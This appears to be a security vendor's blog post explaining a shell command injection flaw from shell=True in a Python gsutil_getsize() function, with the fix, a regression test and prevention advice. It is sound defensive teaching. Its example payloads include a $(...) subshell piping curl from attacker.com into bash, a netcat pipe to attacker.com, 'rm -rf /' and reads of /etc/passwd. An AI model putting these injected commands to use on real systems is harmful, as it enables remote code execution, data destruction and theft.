Back to Blog
critical SEVERITY8 min read

How command injection happens in Python subprocess and how to fix it

A critical shell injection vulnerability was discovered in `utils/downloads.py` where `subprocess.check_output` was called with `shell=True` while passing a user-controlled URL parameter. This allowed attackers to inject arbitrary shell commands by embedding metacharacters like `;`, `&&`, or `$(...)` into a URL string. The fix removes `shell=True`, ensuring the URL is passed as a literal argument in a list rather than being interpreted by the shell.

O
By Orbis AppSec
Published June 9, 2026Reviewed June 9, 2026

Answer Summary

This is a shell command injection vulnerability (CWE-78) in Python's `subprocess.check_output()` call inside `utils/downloads.py`. The root cause is using `shell=True` with a user-controlled URL argument in the `gsutil_getsize()` function, which causes Python to join the argument list into a shell command string where metacharacters like `;` and `$()` are interpreted. The fix is to remove `shell=True` (defaulting to `shell=False`), so the URL is passed as a literal element of an argument list and never evaluated by a shell.

Vulnerability at a Glance

cweCWE-78
fixRemove shell=True so the URL is passed as a literal list argument, never interpreted by the shell
riskArbitrary OS command execution with application privileges
languagePython
root causesubprocess.check_output called with shell=True and a user-controlled URL argument
vulnerabilityShell Command Injection via subprocess shell=True

How command injection happens in Python subprocess and how to fix it

Summary

A critical shell injection vulnerability was discovered in utils/downloads.py where subprocess.check_output was called with shell=True while passing a user-controlled URL parameter. This allowed attackers to inject arbitrary shell commands by embedding metacharacters like ;, &&, or $(...) into a URL string. The fix removes shell=True, ensuring the URL is passed as a literal argument in a list rather than being interpreted by the shell.


Quick Answer: This is a shell command injection vulnerability (CWE-78) in Python's subprocess.check_output() inside gsutil_getsize() in utils/downloads.py. Using shell=True with a user-controlled URL causes Python to pass the entire argument list as a shell command string, where metacharacters are interpreted. The fix: remove shell=True so the URL is treated as a literal list element.


Introduction

The utils/downloads.py file handles downloading and sizing objects from Google Cloud Storage using the gsutil command-line tool. Inside the gsutil_getsize() function, around line 29, a call to subprocess.check_output was made with shell=True — and the URL being queried was passed directly as part of the argument list. That single keyword argument, shell=True, turned a routine file-size check into a critical remote code execution vector.

This is a pattern that appears deceptively safe at first glance: the code passes a list to subprocess.check_output, which looks structured and controlled. But shell=True changes everything about how Python handles that list.


The Vulnerability Explained

What shell=True actually does with a list

When you call subprocess.check_output with a list and shell=True, Python doesn't treat the list as a structured argument array. Instead, it joins the list into a single string and hands it to /bin/sh -c. That means:

# What the code did (VULNERABLE)
url = "gs://bucket/myfile"
subprocess.check_output(["gsutil", "du", url], shell=True, encoding="utf-8")

...gets executed by the shell as:

/bin/sh -c "gsutil du gs://bucket/myfile"

The shell parses the entire string, including any metacharacters embedded in url. If an attacker controls that URL — whether through user input, a configuration file, an API response, or an environment variable — they can inject arbitrary commands.

The specific exploit path

Consider what happens when url contains shell metacharacters:

# Attacker-controlled URL
url = "gs://bucket$(curl http://attacker.com/shell.sh | bash)"

# Resulting shell command:
# gsutil du gs://bucket$(curl http://attacker.com/shell.sh | bash)
# The $(...) subshell executes curl and pipes to bash

Or even simpler:

url = "gs://bucket/file; rm -rf /"
# Shell executes: gsutil du gs://bucket/file
# Then:           rm -rf /

The regression test suite included in this fix documents 27 distinct payload patterns that exploit this, including:

  • Semicolon chaining: gs://bucket/file; cat /etc/passwd
  • Subshell execution: gs://bucket/file$(id)
  • Backtick execution: gs://bucket/file`whoami`
  • Pipe injection: gs://bucket/file | nc attacker.com 4444
  • Newline injection: gs://bucket/file\nrm -rf /
  • Redirection: gs://bucket/file > /etc/crontab

Why this is critical for a Python library

The PR description highlights a key threat model detail: this is a Python library. Any application that imports utils/downloads.py and passes URLs from user input, configuration, or external APIs into gsutil_getsize() is directly exposed. The vulnerability doesn't require the library itself to accept HTTP requests — it just needs the calling application to pass a URL that isn't fully hardcoded.


The Fix

The fix is surgical and precise: remove shell=True.

Before (vulnerable)

# utils/downloads.py:29 — BEFORE
result = subprocess.check_output(
    ["gsutil", "du", url],
    shell=True,
    encoding="utf-8"
)

After (fixed)

# utils/downloads.py:29 — AFTER
result = subprocess.check_output(
    ["gsutil", "du", url],
    encoding="utf-8"
)

shell defaults to False when omitted. With shell=False, Python uses the execvp family of system calls directly — it passes each list element as a separate, literal argument to the gsutil process. The operating system never involves a shell, so there is no shell to interpret metacharacters.

When url is "gs://bucket/file; rm -rf /", the gsutil process receives exactly three arguments:

  1. gsutil
  2. du
  3. gs://bucket/file; rm -rf /

The semicolons, pipes, and dollar signs are just characters in a string — gsutil will reject the malformed URL and return an error, but no shell command is ever executed.

The regression test

A new test file, tests/test_invariant_downloads.py, was added to guard against this vulnerability being reintroduced. It patches subprocess.check_output at the I/O boundary and verifies two invariants for every adversarial payload:

# From tests/test_invariant_downloads.py
@pytest.mark.parametrize("payload", ADVERSARIAL_PAYLOADS)
def test_gsutil_getsize_no_shell_injection(payload):
    mock_output = "1024  gs://bucket/file\n"

    with patch("utils.downloads.subprocess.check_output", return_value=mock_output) as mock_check:
        result = gsutil_getsize(payload)

        mock_check.assert_called_once()
        call_args, call_kwargs = mock_check.call_args

        # Invariant 1: shell=True must never be used
        assert call_kwargs.get("shell", False) is False, (
            f"SECURITY VIOLATION: gsutil_getsize() called subprocess with shell=True "
            f"for payload {payload!r}."
        )

        # Invariant 2: args must be a list/tuple, not a string
        assert isinstance(call_args[0], (list, tuple)), (
            f"subprocess args must be a list/tuple, got {type(call_args[0])}"
        )

This test exercises the real gsutil_getsize() code path — only the subprocess I/O is mocked, so all argument construction logic runs under test. If a future developer reintroduces shell=True, the test suite will catch it immediately.


Prevention & Best Practices

1. Never use shell=True with variable input

The Python documentation itself warns: "Using shell=True can be a security hazard." The rule of thumb is simple:

  • subprocess.run(["cmd", variable_arg], shell=False) — safe
  • subprocess.run(f"cmd {variable_arg}", shell=True) — dangerous
  • subprocess.run(["cmd", variable_arg], shell=True) — also dangerous (list is joined)

2. If you must use a shell, use shlex.quote()

In rare cases where shell features are genuinely needed (e.g., glob expansion, shell built-ins), sanitize every variable with shlex.quote():

import shlex
import subprocess

safe_url = shlex.quote(url)
subprocess.check_output(f"gsutil du {safe_url}", shell=True, encoding="utf-8")

shlex.quote() wraps the value in single quotes and escapes any embedded single quotes, preventing shell interpretation. That said, the preferred approach is always shell=False with a list.

3. Use static analysis tools

Several tools can catch this pattern automatically:

  • Bandit (B603, B602): Flags subprocess calls with shell=True
  • Semgrep: Rules for subprocess-shell-true and dangerous-subprocess-use
  • PyLint: W1510 warns on subprocess calls with shell=True

Add these to your CI pipeline to catch regressions before they reach production.

4. Apply the principle of least privilege

Even with shell=False, consider whether the process running gsutil needs full filesystem access. Running download utilities in a restricted environment (containers, reduced IAM roles, seccomp profiles) limits blast radius if another vulnerability is found.

5. Validate URL schemas

For gsutil specifically, consider validating that the URL starts with gs:// and matches an expected pattern before passing it to subprocess:

import re

GCS_URL_PATTERN = re.compile(r'^gs://[a-z0-9][a-z0-9._-]{1,61}[a-z0-9]/[\w./-]*$')

def gsutil_getsize(url: str) -> int:
    if not GCS_URL_PATTERN.match(url):
        raise ValueError(f"Invalid GCS URL: {url!r}")
    return subprocess.check_output(["gsutil", "du", url], encoding="utf-8")

This is defense-in-depth — it doesn't replace shell=False, but it adds an additional layer.


Key Takeaways

  • shell=True with a list argument is not safer than shell=True with a string — Python joins the list before passing to /bin/sh, so metacharacters in any element are still interpreted.
  • The fix in utils/downloads.py is one keyword argument — removing shell=True from the subprocess.check_output call in gsutil_getsize() is sufficient to eliminate the injection vector entirely.
  • Library code is higher risk — because utils/downloads.py is imported by other applications, a vulnerability here multiplies across every application that calls gsutil_getsize() with external input.
  • Regression tests should verify subprocess call signatures, not just return values — the new test_invariant_downloads.py checks call_kwargs.get("shell", False) directly, making it impossible for this pattern to silently reappear.
  • 27 distinct payload patterns bypass naive sanitization — newlines, null bytes, percent-encoding, and nested subshells all work around simple blocklists; structural fixes (shell=False) are the only reliable defense.

How Orbis AppSec Detected This

  • Source: The url parameter passed into gsutil_getsize() in utils/downloads.py, which can be derived from user input, configuration files, or external API responses.
  • Sink: subprocess.check_output(["gsutil", "du", url], shell=True, encoding="utf-8") at utils/downloads.py:29 — the shell=True keyword causes the OS shell to interpret the URL as a command string.
  • Missing control: No validation that url is free of shell metacharacters, and no use of shell=False to prevent shell interpretation of the argument list.
  • CWE: CWE-78 — Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection").
  • Fix: Removed shell=True from the subprocess.check_output call so the URL is passed as a literal argument element via execvp, bypassing the shell entirely.

Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.


Conclusion

The vulnerability in utils/downloads.py is a textbook example of how a single keyword argument can turn a routine system call into a critical security flaw. The shell=True parameter in subprocess.check_output is one of Python's most dangerous footguns — it silently changes the execution model from structured argument passing to full shell interpretation, and it does so even when you pass a list instead of a string.

The fix is minimal, the security gain is maximal, and the regression tests ensure the property holds permanently. If you're using subprocess anywhere in your codebase, audit every call site for shell=True — especially anywhere that touches external input. It's a one-word change with critical consequences either way.


References

Frequently Asked Questions

What is shell command injection in Python subprocess?

It occurs when subprocess is called with shell=True and a user-controlled string, causing the shell to interpret metacharacters like ;, &&, and $() as commands rather than literal text.

How do you prevent shell injection in Python subprocess?

Always use shell=False (the default) and pass arguments as a list. This ensures each element is treated as a literal argument, never parsed by a shell.

What CWE is shell command injection?

CWE-78: Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection").

Is input validation enough to prevent shell injection in Python?

No. Input validation can help, but the most robust fix is to avoid shell=True entirely. Allowlists and sanitization can be bypassed; shell=False with a list argument is the definitive solution.

Can static analysis detect shell=True subprocess calls?

Yes. Tools like Semgrep, Bandit, and multi-agent AI scanners can flag subprocess calls using shell=True with variable arguments as high-risk patterns.

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #13775

Related Articles

critical

How command injection happens in Python os.system() and how to fix it

A critical command injection vulnerability was discovered in the `data/xView.yaml` dataset download script, where `os.system(f'rm -rf {labels}')` constructed a shell command using an f-string with a path derived from user-controlled YAML configuration. An attacker supplying a crafted dataset YAML file could embed shell metacharacters in the path to execute arbitrary commands. The fix replaces the shell invocation entirely with Python's `shutil.rmtree()`, eliminating the attack surface by never i

critical

How NULL pointer dereference happens in C gotcha_malloc() and how to fix it

A critical NULL pointer dereference vulnerability was discovered in `src/gotcha_utils.c` at line 84, where the `add_library()` function called `gotcha_malloc()` without checking whether the allocation succeeded before dereferencing the returned pointer. Because `gotcha_malloc` uses `mmap` internally, it can return `NULL` or `MAP_FAILED` under memory pressure, causing a segmentation fault that crashes the host application. The fix adds a single, targeted null check that returns early if allocatio

high

How Spring Boot EndpointRequest.to() security bypass happens in Java Spring Boot and how to fix it

CVE-2025-22235 is a high-severity vulnerability in Spring Boot where `EndpointRequest.to()` creates an incorrect request matcher when an actuator endpoint is not exposed, potentially allowing unauthorized access to protected endpoints. The fix upgrades Spring Boot from 3.4.4 to 3.4.5 in the anti-corruption-layer service's `pom.xml`. This is particularly dangerous because actuator endpoints can expose sensitive operational data and administrative functions.

medium

How path traversal happens in C file extraction and how to fix it

A path traversal vulnerability in the borpak archive extraction tool allowed attackers to write files to arbitrary locations on the filesystem by crafting malicious .pak archives with `../` sequences in filenames. This medium-severity issue in `tools/borpak/source/borpak.c` could enable system compromise through overwriting critical files like `.bashrc` or cron jobs. The fix implements path validation to ensure extracted files never escape the intended extraction directory.

critical

How SQL injection happens in PostgreSQL dictionary synchronization and how to fix it

A critical SQL injection vulnerability in `zhparser--2.1.sql` allowed attackers to execute arbitrary SQL commands by crafting malicious database names. The vulnerability existed because the dictionary synchronization function constructed COPY commands using string concatenation without proper escaping. This fix implements parameterized queries to safely handle database identifiers.

critical

How buffer overflow happens in C LZSS decompression and how to fix it

A high-severity buffer overflow vulnerability was discovered in `user/libprtos/common/lzss.c`, where the LZSS decompression routine failed to validate offset and length values decoded from compressed input before using them as indices into the `text_buf` ring buffer. An attacker supplying crafted compressed data could trigger out-of-bounds reads or writes, potentially leading to memory corruption, information disclosure, or arbitrary code execution. The fix introduces strict bounds validation on